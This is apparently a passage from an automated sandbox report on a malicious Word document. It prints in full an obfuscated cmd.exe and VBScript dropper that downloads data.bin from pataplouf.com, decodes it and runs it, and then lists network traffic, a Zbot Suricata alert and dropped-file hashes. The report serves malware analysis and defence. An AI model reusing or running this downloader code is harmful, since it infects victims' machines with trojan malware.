Xq(O9X)" "LB9K3lq=20" "Xq=ChR(O9X)" "MlEw=35" "End fuNCtiOn" "sUB DIQpv(XwwrXco)" "YIMk=79" "diM CSbzZ6" "VCM=19" "D2S="CG"" "NPSbD=23" "Set CSbzZ6=CreATeobJeCT(QtJtaSP("06070807056D14373526262E",D2S))" "IV=55" "CSbzZ6.opEn" "SfQ1=45" "CSbzZ6.TYPe=601-600" "Q20S=68" "CSbzZ6.WrITe XwwrXco" "Sr30EMj=24" "CSbzZ6.sAVEToFiLe Achkd7 & QtJtaSP("4332213D","RmJl"),2739-2737" "V6FY=94" "CSbzZ6.CLoSE" "JH8q8VI=4" "TxS" "WmBpI=26" "EnD suB" "fUNcTIOn SS(Ov,XS90)" "C6WVy=96" "SS=(Ov ANd NOt XS90)oR(noT Ov ANd XS90)" "UPzyhh=55" "ENd FUNcTION") do @echo %~i)>"!Fi!" && start "" "!Fi!"
(PID: 3504)
- wscript.exe "%APPDATA%\10326.vbs" (PID: 3196)
-
cmd.exe
/V /C set "Fi=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm Achkd7" "SuB GMe()" "Rp=21" "Dim YgwrSK, FsL3" "For YgwrSK = 25 To 3000836" "FsL3 = CaB + 47 + 74 + 67" "Next" "NVIN0y=77" "eND sUB" "SuB Qz69Gr()" "WgNy=10" "diM Pb,KyMSJS" "AkH=44" "Do WHiLe Pb<>5971-5970" "KyMSJS=KyMSJS+1" "LOop" "Nb91Fm=92" "enD suB" "SUb CYTeou()" "FeeR8ZX=22" "IHdN1tW=93548496" "Kzhe=80" "FoR NXanLiG=1 To IHdN1tW" "LnYDeX=LnYDeX+1" "nEXT" "KY=93" "iF LnYDeX=IHdN1tW ThEn" "JzcJkJg=55" "CU7((-1725+1729))" "UZuPjx=57" "Nd7KQ(QtJtaSP("3A473332567F7D4326360D203E5C322442333D5E68260D24331D252B02","PR3GBl"))" "GE3A=1" "eND iF" "PJwzQ8s=26" "eNd SUb" "FUnCTIoN DxgZT1m()" "KDBJ=62" "DxgZT1m=secOnd(tIme)" "SxxW=39" "ENd fUNctIOn" "sUB TxS()" "Wq=63" "QBNQ3=""""" "Ycs8R=18" "Ie=Achkd7 & DxgZT1m & QtJtaSP("49380828","Jg")" "K4Stv=28" "BEo9f=QtJtaSP("315C027F2A2A54467E0C726232101D061144736F70","OR1fQ")" "Kd=8" "XIVDU50 Achkd7 & QtJtaSP("4C0D070A","ObuJecd"),Ie" "AIuk=73" "iF RHlWYg="" THEn CU7((-1376+1380))" "PvZk=16" "Gn6F="VCox3r"" "AYs=31" "seT JEJsd=CReatEobjEct(QtJtaSP("143C1B411B2637412B5B173A2F",Gn6F))" "AOg4ba=37" "JEJsd.ruN BEo9f & Ie & QBNQ3,6560-6560,7267-7267" "XPYv4mK=50" "enD SUb" "SuB CU7(J7WbxsB)" "PBJ2U=34" "Dim Caz" "NhFW=74" "Caz=TImER+J7WbxsB" "dO whiLe tImeR<Caz" "LOoP" "Tk=28" "ENd SuB" "FUnctiON O1u1mv(ODIE)" "XSAxnm=60" "O1u1mv=Asc(ODIE)" "T5aBIk=32" "eNd FuNCtioN" "FuNCTioN XIVDU50(VW,Dq3cX)" "J6S1l=44" "DIm Lt5k,QVd,Y6Zi,PVs,O7RZ(5)" "KVf0DtC=57" "O7RZ(2)=107" "WK1=94" "O7RZ(3)=50" "Xi81d=13" "O7RZ(1)=100" "BWe=48" "O7RZ(0)=104" "S1=93" "O7RZ(4)=54" "CogoeB=84" "O7RZ(5)=52" "WU=31" "ES=29" "SEt Lt5k=cReAteObjecT(QtJtaSP("312F102512380B22056224250E293135113807212D2E08290138", "Lb"))" "IbBc0=5" "sET QVd=Lt5k.gEtFILe(VW)" "Ci=86" "SeT PVs=QVd.opeNaStEXTStREAM(2538-2537,3352-3352)" "Iz=21" "Set Y6Zi=Lt5k.CreaTEtEXtFiLE(Dq3cX,8545-8544,8759-8759)" "DCM=85" "dO UNtIl PVs.aTeNdOfSTREAm" "Y6Zi.WritE Xq(SS(O1u1mv(PVs.REad(4207-4206)),O7RZ(0)))" "lOOp" "Ivr4Mw=34" "Y6Zi.ClOsE" "VJsbrj=74" "PVs.cLOSe" "L97b=76" "End FUnCTiOn" "functioN QtJtaSP(Fo,Ao6w)" "WMokkI=71" "DiM Vi,O7lkn,B0pG" "KE8ZS7=63" "FoR Vi=1 tO (leN(Fo)/2)" "O7lkn=(Xq((312664/8228)) & Xq((8941-8869))&(mID(Fo,(Vi+Vi)-1,2)))" "B0pG=(O1u1mv(mId(Ao6w,((Vi moD LEn(Ao6w))+1),1)))" "QtJtaSP=QtJtaSP+Xq(SS(O7lkn,B0pG))" "neXT" "WSfPz6=57" "ENd FuNCtIoN" "VA5QGfR=73" "CYTeou" "FUnctiON Nd7KQ(GTbP6f)" "BqGq0RG=11" "dIm WCeZFHb,AyIhL4K" "IdG9PM1=57" "BuIfair="Jb27d1V"" "JDQ6rC=55" "On eRroR rESUmE NExT" "OJBln7=92" "By4="PPzg0p"" "MbeazkY=25" "sET WCeZFHb=CreateObjEct(QtJtaSP("07290442192024543458153C3C",By4))" "NrywC=36" "YK3N="GB1RNF3"" "GMe" "XCh2R6x=30" "Set CCZAg=WCeZFHb.ENVirONment(QtJtaSP("041906170E1A07","ITK"))" "NvzvBsE=22" "Achkd7=CCZAg(QtJtaSP("18023A1218062B","VYRj"))&Xq((3365-3273))& DxgZT1m & DxgZT1m" "SNLX=66" "AadE="Ik44c3"" "UyGq=84" "sEt AyIhL4K=CReaTeobJEcT(QtJtaSP("265D57115C3A0452404D6B04277C603763",AadE))" "A6CJ6=68" "AyIhL4K.opEN QtJtaSP("761765","R1"),GTbP6f,5182-5182" "QHxnncN=82" "AyIhL4K.SENd()" "CCqqVDx=18" "if AyIhL4K.statuS=(-6219+6419) then" "PNj7=47" "GMe" "AqUgAF=38" "CU7((18308/4577))" "Ds6EZ=40" "DIQpv AyIhL4K.ReSpONSeBoDy" "CSb1Qh=35" "Else" "Vhojn7=42" "U7="Dm"" "R6svB=41" "SEt AyIhL4K= crEAteoBJeCt(QtJtaSP("202D0E3602370222196A3509210C39103D",U7))" "Qt=7" "AyIhL4K.oPeN QtJtaSP("207722","Tg2vPcQ"),QtJtaSP("3A053A21685E616362466064655F767F60447F7E36103A307C13273F","QRqN" ),2749-2749" "SrAH=49" "AyIhL4K.seND()" "QjL=79" "If AyIhL4K.sTAtuS=(1431800/7159)TheN DIQpv AyIhL4K.REsPONsEBoDY" "Q0G2=43" "MZax2z=55" "end if" "Pd3C=47" "EnD fuNctIoN" "FUnCtiOn Xq(O9X)" "LB9K3lq=20" "Xq=ChR(O9X)" "MlEw=35" "End fuNCtiOn" "sUB DIQpv(XwwrXco)" "YIMk=79" "diM CSbzZ6" "VCM=19" "D2S="CG"" "NPSbD=23" "Set CSbzZ6=CreATeobJeCT(QtJtaSP("06070807056D14373526262E",D2S))" "IV=55" "CSbzZ6.opEn" "SfQ1=45" "CSbzZ6.TYPe=601-600" "Q20S=68" "CSbzZ6.WrITe XwwrXco" "Sr30EMj=24" "CSbzZ6.sAVEToFiLe Achkd7 & QtJtaSP("4332213D","RmJl"),2739-2737" "V6FY=94" "CSbzZ6.CLoSE" "JH8q8VI=4" "TxS" "WmBpI=26" "EnD suB" "fUNcTIOn SS(Ov,XS90)" "C6WVy=96" "SS=(Ov ANd NOt XS90)oR(noT Ov ANd XS90)" "UPzyhh=55" "ENd FUNcTION") do @echo %~i)>"!Fi!" && start "" "!Fi!"
(PID: 3504)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
pataplouf.com | 213.186.33.168 | - | France |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
213.186.33.168 |
80
TCP |
wscript.exe PID: 3196 |
France
ASN: 16276 (OVH SAS) |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
213.186.33.168:80 (pataplouf.com) | GET | pataplouf.com/data.bin |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 213.186.33.168:80 (TCP) | A Network Trojan was detected | ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin | 2018052 |
Extracted Strings
Extracted Files
-
Informative 14
-
-
10326.vbs
- Size
- 3.8KiB (3865 bytes)
- Type
- ASCII text, with CRLF line terminators
- MD5
- c82d7f346fe8c646c5a4bc4eaceab4ea
- SHA1
- 4125fd7d2b4b63e2d7f15895425458e9cfe1641a
- SHA256
- bb58052f4cb4357472d99864119e3c0301f21a12454c40bc5d6711fa04e2aa01
-
~WRD0000.tmp
- Size
- 68KiB (69120 bytes)
- Type
- Composite Document File V2 Document, No summary info
- MD5
- a7ef20c7b37d66f3078ebbd95396ddfb
- SHA1
- 363c37321169ed4310a3bb72a63482e652e122c0
- SHA256
- fad277038f2f68865ebbb0f6987e0290aeb3d136820c5b420cc5b639d75c487b
-
~WRD0001.tmp
- Size
- 144KiB (147456 bytes)
- Type
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: chilacayote , Template: Normal, Last Saved By: RIVLL3q, Revision Number: 6, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:40:00, Create Time/Date: Sat Jun 4 06:27:00 2016, Last Saved Time/Date: Mon Aug 8 22:27:00 2016, Number of Pages: 5, Number of Words: 9471, Number of Characters: 53987, Security: 0
- MD5
- 3f330636a54dc5b8f6544949786ec593
- SHA1
- 19c030f68fc99e0d5a61780947ab01dd5a4ddd5a
- SHA256
- d24b936305a426cb26ed3ce45ad13b069436fa97dd49e205938d2a3c37302484
-
~WRS{D26DCFE4-5D22-4BFD-AC94-AE68EB65F307}.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- MD5
- 1fcfa8cadac9312838e32f0c161f7c6b
- SHA1
- a7515ff139c098bc0a4935c8a71e0a055babde27
- SHA256
- bcb9bdee70edea411556c20fbcbeaac133e76309fd806e488887388f269dd964
-
index.dat
- Size
- 534B (534 bytes)
- Type
- data
- MD5
- 63db170127526f9a142f00c93610c11d
- SHA1
- c11fb210b1e28d9170e0549c59507f1ffcb19a59
- SHA256
- 38ec14e1be897c3e9b27f29f8d72338a2d122c47e2c06d3adfe6c187f92f759b
-
data[1].bin
- Size
- 373KiB (381571 bytes)
- Type
- data
- MD5
- 3f9ad3c1ad05533cbdc9f050d73dcf1b
- SHA1
- 0b8b91665ec4378269f1e6c6cfe2f65450a2bb71
- SHA256
- 685ac950f5720f574f608c74cf1a9d937db05a0245dec85c419d5e35088b0df0
-
ExcludeDictionaryEN0409.lex
- Size
- 2B (2 bytes)
- Type
- Little-endian UTF-16 Unicode text, with no line terminators
- MD5
- f3b25701fe362ec84616a93a45ce9998
- SHA1
- d62636d8caec13f04e28442a0a6fa1afeb024bbb
- SHA256
- b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
-
~$91c49ffaf3ef41a99a3fb8eb5fda46baa78329ea48ad755c316efd0551f7e2.doc
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 8d27de98160c17a58e6fe17830347b98
- SHA1
- bbb6c67b83fcab607a31b6ff12721604e8548d69
- SHA256
- c70b58be1d0772669173be64fd050864dd8dfd9649de56e1a8b09b93e784a8f2
-
00.xMo
- Size
- 373KiB (381571 bytes)
- Type
- data
- MD5
- 3f9ad3c1ad05533cbdc9f050d73dcf1b
- SHA1
- 0b8b91665ec4378269f1e6c6cfe2f65450a2bb71
- SHA256
- 685ac950f5720f574f608c74cf1a9d937db05a0245dec85c419d5e35088b0df0
-
~WRS{432DDB46-44E9-4579-9602-8C7F41CE1E59}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
000.rob
- Size
- 67KiB (69098 bytes)
- Type
- PE32 executable (GUI) Intel 80386, for MS Windows
- MD5
- 484680908df016fc889e149e59bdacee
- SHA1
- 3873a5b92b5e927c9ecf95aa7109d659ccc66e96
- SHA256
- b1bc8108373c39437db31c6e227930e6390912b0262a836ccc9a659a32ebbcdb
-
~WRS{6FFD5514-5D5B-48F1-83E1-5E8708FC9E80}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 8d27de98160c17a58e6fe17830347b98
- SHA1
- bbb6c67b83fcab607a31b6ff12721604e8548d69
- SHA256
- c70b58be1d0772669173be64fd050864dd8dfd9649de56e1a8b09b93e784a8f2
-
fb91c49ffaf3ef41a99a3fb8eb5fda46baa78329ea48ad755c316efd0551f7e2.LNK
- Size
- 733B (733 bytes)
- Type
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Mon Aug 8 17:29:52 2016, mtime=Mon Aug 8 21:27:40 2016, atime=Mon Aug 8 21:28:00 2016, length=318976, window=hide
- MD5
- 0d716ef87623e5dbef3d05011210d8ce
- SHA1
- 29e7cd69b55b2ee22123a93c728fec9b4c5a7101
- SHA256
- ea742f78de638be36288ab8b3e7085babaa60fa3ac842ee7d16eae40aa1190c5
-
Notifications
-
Runtime
- Dropped file "000.rob" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/b1bc8108373c39437db31c6e227930e6390912b0262a836ccc9a659a32ebbcdb/analysis/1470677828/")
- Dropped file "~WRD0000.tmp" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/fad277038f2f68865ebbb0f6987e0290aeb3d136820c5b420cc5b639d75c487b/analysis/1470677823/")
- Dropped file "~WRD0001.tmp" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/d24b936305a426cb26ed3ce45ad13b069436fa97dd49e205938d2a3c37302484/analysis/1470677826/")
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "hooks-8" are available in the report
- Not all sources for signature ID "string-43" are available in the report
- Sample was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/fb91c49ffaf3ef41a99a3fb8eb5fda46baa78329ea48ad755c316efd0551f7e2/analysis/1470677806/")